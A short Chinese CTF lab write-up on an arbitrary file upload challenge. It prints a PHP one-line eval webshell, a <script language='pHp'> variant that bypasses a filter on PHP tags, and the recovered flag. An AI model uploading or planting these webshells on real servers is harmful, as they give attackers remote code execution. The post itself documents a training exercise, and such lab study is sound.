php一句话木马获取webshell


合天实验:第八周任意文件上传

题目:

想传什么就传什么,无所谓!
flag在/var/www/html/flag.php

看到是文件上传第一想到的是一句话木马:

<?php eval($_POST['ant']);?>

 

成功的把木马上传上去,,打开菜刀进行连接连接失败于是打开上传的php文件却发现php代码被过滤如图:

于是吧一句话木马改成:

<script language="pHp">@eval($_POST['123'])</script>

 

 在从新进行上传

 

 

题目提示flag在/var/www/html/flag.php 


所以

<?php
echo 'here_is_flag';
'flag{0123_4567_8901}';

 

 

 


免责声明!

本站转载的文章为个人学习借鉴使用,本站对版权不负任何法律责任。如果侵犯了您的隐私权益,请联系本站邮箱yoyou2525@163.com删除。



 
粤ICP备18138465号  © 2018-2025 CODEPRJ.COM